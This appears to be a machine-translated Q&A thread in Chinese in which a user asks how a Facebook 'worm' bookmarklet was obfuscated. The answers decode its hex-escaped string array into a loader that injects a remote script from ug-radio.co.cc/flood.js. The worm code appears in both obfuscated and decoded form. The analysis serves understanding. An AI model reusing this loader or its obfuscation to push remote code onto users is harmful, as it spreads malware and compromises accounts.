Javascript 如何对这个脚本进行编码？

我最近发现了这个srcipt，它基本上是一个facebook“蠕虫”，所以不要运行它。我只想知道造物主是如何对它进行编码的。有什么帮助吗

javascript:var _0x8dd5=["\x73\x72\x63","\x73\x63\x72\x69\x70\x74","\x63\x7 2\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x 68\x74\x74\x70\x3A\x2F\x2F\x75\x67\x2D\x72\x61\x64 \x69\x6F\x2E\x63\x6F\x2E\x63\x63\x2F\x66\x6C\x6F\x 6F\x64\x2E\x6A\x73","\x61\x70\x70\x65\x6E\x64\x43\ x68\x69\x6C\x64","\x62\x6F\x64\x79"];(a=(b=document)[_0x8dd5[2]](_0x8dd5[1]))[_0x8dd5[0]]=_0x8dd5[3];b[_0x8dd5[5]][_0x8dd5[4]](a); void (0);

---

作者使用了各种“模糊处理”方法，也就是说，各种技术使代码在视觉上令人困惑，难以理解

\u 0x8dd5

是一个字符串数组：

['src', 'script', 'createElement',
    'http://ug-radio.co.cc/flood.js', 'appendChild', 'body']

代码的其余部分使用上面字符串中的属性名，因此未模糊化的代码实际上是

a = document.createElement('script');
a.src = 'http://ug-radio.co.cc/flood.js';
document.body.appendChild(a);

因此，作者为混淆代码所做的只是将所有属性名作为数组中的字符串引用。包含字符串的数组只使用了十六进制转义表示法，使得这些字符串的含义不那么明显

---

作者通过查找在当前编码中构成字符串的字节的十六进制值来实现这一点。然后，对于字符串中的每个字节，他添加

\xNN

，其中

NN

是十六进制字节值。当JavaScript解释器运行脚本时，解析器会自动将这些转义替换为各自的字符。

我知道脚本的作用，另一个问题向我展示了这一点。我想知道他到底是怎么编码的。你能给我看一下他是怎么混淆的吗？很抱歉，我对js很陌生。@Emily如果您以类似的方式编写原始脚本：使用字符串数组，然后引用数组，您可以使用代码模糊器将字符串转换为utf-8编码，并使用类似或类似的工具。哇，太好了。谢谢你的信息。还有一件事。我很想知道创建者是如何从facebook上的外部主机（ug radio.co.cc）运行脚本的。是否有js脚本允许您包含外部脚本？@Emily。编码脚本创建了一个

script

标记，其中包含外部Javascript。他仍然不得不以某种方式诱使用户手动插入原始编码的Javascript，或者通过Facebook上的安全漏洞插入。这是一个错误。我想你的意思是“模糊化”可以用它来清理。